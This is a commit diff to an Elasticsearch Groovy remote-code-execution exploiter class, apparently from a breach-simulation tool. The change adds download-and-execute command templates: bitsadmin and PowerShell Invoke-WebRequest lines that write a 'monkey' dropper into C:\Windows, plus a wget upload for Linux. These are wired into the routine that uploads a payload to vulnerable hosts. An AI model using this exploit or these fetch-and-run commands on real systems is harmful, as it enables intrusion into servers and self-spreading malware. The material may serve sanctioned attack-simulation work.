Commands tested and working on windows.
This commit is contained in:
parent
7e2cc86ab9
commit
a54eedec11
|
@ -6,13 +6,14 @@
|
||||||
|
|
||||||
import json
|
import json
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
import requests
|
import requests
|
||||||
|
|
||||||
from model import DROPPER_ARG
|
|
||||||
from network.elasticfinger import ES_SERVICE, ES_PORT
|
from network.elasticfinger import ES_SERVICE, ES_PORT
|
||||||
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||||
from exploit.web_rce import WebRCE
|
from exploit.web_rce import WebRCE
|
||||||
|
from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
|
||||||
|
|
||||||
|
import copy
|
||||||
|
import re
|
||||||
|
|
||||||
__author__ = 'danielg'
|
__author__ = 'danielg'
|
||||||
|
|
||||||
|
@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
||||||
|
|
||||||
|
# Both commands are prepared for use in future development
|
||||||
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
|
POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
|
@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
if not vulnerable_urls:
|
if not vulnerable_urls:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config):
|
# Extra escaping required:
|
||||||
|
config = copy.deepcopy(self._config)
|
||||||
|
config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
|
||||||
|
config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
|
||||||
|
|
||||||
|
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
|
||||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
||||||
return False
|
return False
|
||||||
|
|
||||||
data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0])
|
commands = {'windows': self.RDP_CMDLINE_HTTP,
|
||||||
|
'linux': WGET_HTTP_UPLOAD}
|
||||||
|
|
||||||
|
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands)
|
||||||
|
|
||||||
# We can't use 'if not' because response may be ''
|
# We can't use 'if not' because response may be ''
|
||||||
if data is not False and data['response'] == False:
|
if data is not False and data['response'] == False:
|
||||||
|
@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
payload = self.JAVA_CMD % command
|
payload = self.JAVA_CMD % command
|
||||||
response = requests.get(url, data=payload)
|
response = requests.get(url, data=payload)
|
||||||
result = self.get_results(response)
|
result = self.get_results(response)
|
||||||
if not result: # not vulnerable
|
if not result:
|
||||||
return False
|
return False
|
||||||
return result[0]
|
return result[0]
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue